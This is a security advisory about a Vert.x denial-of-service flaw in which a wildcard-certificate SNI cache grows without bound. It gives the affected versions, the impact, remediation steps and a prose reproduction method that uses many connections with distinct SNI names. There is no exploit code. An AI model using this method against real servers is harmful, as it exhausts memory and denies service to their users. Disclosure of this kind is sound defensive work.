Eclipse Vert.x Wildcard SNI Cache Growth Vulnerability Leading to Denial-of-Service

A denial-of-service vulnerability has been identified in Eclipse Vert.x versions 4.3.4 through 5.0.8. The issue arises from unbounded growth in the server-side SNI (Server Name Indication) cache during TLS handshakes. When a TCP client presents SNI names that match a wildcard certificate (e.g., *.example.com), the server caches these entries without a limit or eviction policy. This can lead to increased memory consumption and potential resource exhaustion.

Impact

Exploitation of this vulnerability can cause unbounded memory growth on the server, leading to resource exhaustion and denial-of-service conditions.

Reproduction

To reproduce this vulnerability, configure a Vert.x server to use SSL and enable server-side SNI. Then, send repeated connections with distinct SNI values that match a wildcard certificate. The SNI cache will grow with each unique matching name, consuming increasing amounts of memory.

Remediation

Users can disable server-side SNI if it is not needed, avoid wildcard hostname mappings that could lead to high cache growth, and apply rate limiting or connection controls in front of the service.